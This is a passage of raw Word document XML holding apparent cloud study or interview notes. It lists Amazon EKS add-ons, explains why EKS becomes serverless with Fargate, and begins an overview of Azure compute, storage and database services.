        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD6DB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ach node runs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B2E2E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let (talks to API server)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B6C653"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proxy (networking rules for pod communication)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E35044"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ontainer runtime (like containerd or Docker)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="508B330B"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38CD5">
          <v:rect id="_x0000_i3720" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="07320D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EKS Services &amp; Add-ons</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264B45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t>These are services/features you can enable or integrate in your EKS cluster:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30ACCA9F"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE600D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CNI Plugin</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: AWS VPC-native networking for pods (each pod gets a VPC IP).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65BB121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reDNS</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Cluster DNS for service discovery.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B2026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gress Controller</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: For exposing services via HTTP/HTTPS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C13018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opular: NGINX Ingress, AWS ALB Ingress Controller.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102EAFA0"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Load Balancing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A145235"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LB / ALB</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> integration via Service of type LoadBalancer or Ingress.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A2A73A"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02F62C1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CSI Driver</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Persistent volumes via EBS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39066E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FS CSI Driver</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Shared volumes via EFS (good for stateful apps).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C0B62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6A185D9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 Container Insights</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Metrics and logs for containers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43CB53E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rometheus + Grafana</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Custom metrics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A5DB9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Fluent Bit/Fluentd</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Logging agents.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="289E760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IAM Integration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622249D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Roles for Service Accounts (IRSA)</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Fine-grained IAM access for pods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5878E8B8"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ecurity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3184CC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Network Policies</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Control traffic between pods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA965FE"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od Security Policies / OPA Gatekeeper / Kyverno</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Policy enforcement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53BA90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rets Management</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kubernetes Secrets or integrate with AWS Secrets Manager.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37426BB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Autoscaling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A2A994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uster Autoscaler</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Adds/removes worker nodes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F471E2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orizontal Pod Autoscaler</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Scales pods based on CPU/memory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="065D4E9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ertical Pod Autoscaler</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Adjusts resource requests for pods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="449D7B3B"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 Tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688D67FD"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Integrated with:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13DB41C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p>
    <w:p w14:paraId="5D776C9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rgo CD / Flux</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for GitOps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="498D11DA"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lm</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for packaging Kubernetes apps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A464486" w14:textId="3A05C5D3"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721" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="45655DD3" w14:textId="36F661A4" w:rsidR="003002AA" w:rsidRPr="00CE4B95" w:rsidRDefault="003002AA">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="915" w:name="_Toc197868129"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the benefit of Serverless services? Is EKS serverless?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="915"/>
    </w:p>
    <w:p w14:paraId="5CE39845" w14:textId="41D2C2BC" w:rsidR="0095769D" w:rsidRPr="00C632D7" w:rsidRDefault="0095769D" w:rsidP="00FC2EFF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="710"/>
        </w:num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Benefits of Serverless Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22556BD4"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Serverless computing means </w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>you don't manage the server infrastructure</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>—the cloud provider does. Here's why it's beneficial:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="421678E9"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4CDBBA77">
          <v:rect id="_x0000_i3722" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="732954C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1. No Server Management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A5C00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don’t have to provision, scale, or manage servers. Just focus on code or configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C51B9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2. Auto-Scaling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CBF850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Automatically scales up/down based on usage (requests, events, etc.)—great for unpredictable workloads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5E76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3. Pay-as-You-Go</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="150108A5"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pay </w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>only for actual usage</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., requests handled, compute time), not for idle time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B557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4. Faster Development</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF6B76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focus purely on functionality—great for microservices or event-driven apps.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E6D964"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5. High Availability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482E852E"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Built-in fault tolerance, availability, and scalability by the cloud provider.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB803DD"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248D49B0">
          <v:rect id="_x0000_i3723" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D78FA1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Is EKS Serverless?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451E54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EKS is </w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>not entirely serverless</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, but:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A1D1B9"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EC2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F77E3F"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manage EC2 worker nodes</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (infrastructure) → </w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>NOT serverless</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B3212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AWS Fargate:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0B04E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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>YES, this is serverless</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC896F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don't manage servers or EC2 nodes</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C547B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lastRenderedPageBreak/>
        <w:t>Just define your pods and Fargate runs them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00180A5D" w14:textId="77777777" w:rsidR="0095769D" w:rsidRPr="00C632D7" w:rsidRDefault="0095769D" w:rsidP="00C632D7">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>💡</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>So, EKS becomes serverless when integrated with AWS Fargate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355245DC"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5B50B256">
          <v:rect id="_x0000_i3724" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="304EEBFB"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When to Use EKS with Fargate (Serverless Mode)?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EBFC23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hort-lived workloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8B97F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mall/medium apps needing high isolation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F52D272"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When you want Kubernetes + serverless simplicity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4383E497" w14:textId="3863B239" w:rsidR="006C0B8D" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00D61854">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="41D67F6F">
          <v:rect id="_x0000_i3725" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="15BF8E52" w14:textId="77777777" w:rsidR="00C632D7" w:rsidRDefault="00C632D7">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5991E29" w14:textId="4D858156" w:rsidR="00E8719B" w:rsidRPr="00CE4B95" w:rsidRDefault="006C0B8D" w:rsidP="006C0B8D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="916" w:name="_Toc197868130"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Azure</w:t>
      </w:r>
      <w:bookmarkEnd w:id="916"/>
    </w:p>
    <w:p w14:paraId="0508CC76" w14:textId="77777777" w:rsidR="003D11FF" w:rsidRPr="00CE4B95" w:rsidRDefault="003D11FF" w:rsidP="003D11FF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DFB5A8B" w14:textId="48DBA50C" w:rsidR="00B21219" w:rsidRPr="00CE4B95" w:rsidRDefault="009B352A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="917" w:name="_Toc197868131"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain Azure Services</w:t>
      </w:r>
      <w:r w:rsidR="00B21219" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="917"/>
    </w:p>
    <w:p w14:paraId="149C0938" w14:textId="23F47870" w:rsidR="00584DD9" w:rsidRPr="00C632D7" w:rsidRDefault="00584DD9" w:rsidP="00FC2EFF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="710"/>
        </w:num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mpute Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="411A64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 (VMs):</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>Run Windows or Linux VMs in the cloud. Fully configurable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C84492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w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>Host web apps, REST APIs, or mobile backends—fully managed platform.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F76AE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Serverless):</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>Run event-driven code without managing infrastructure (pay-per-use).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53CE1FC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ubernetes Service (AKS):</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>Managed Kubernetes service for containerized applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A5DDAD"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A9360">
          <v:rect id="_x0000_i3726" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6735FB27"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Storage Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF108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r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>Object storage for unstructured data (images, videos, logs).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65CE780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isk Storage:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>Persistent block storage for Azure VMs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CDF327B"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ile Storage:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>Fully managed file shares accessible via SMB/NFS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A06A4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 Lake Storage:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>Big data analytics storage, optimized for analytics workloads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1A1E9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C48E48">
          <v:rect id="_x0000_i3727" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5713E61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atabase Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316FB1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r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>Managed relational SQL database service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="250C0D6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smos DB:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>Globally distributed NoSQL database with multi-region writes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6A0D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base for MySQL/PostgreSQL:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>Managed open-source databases.</w:t>
      </w:r>
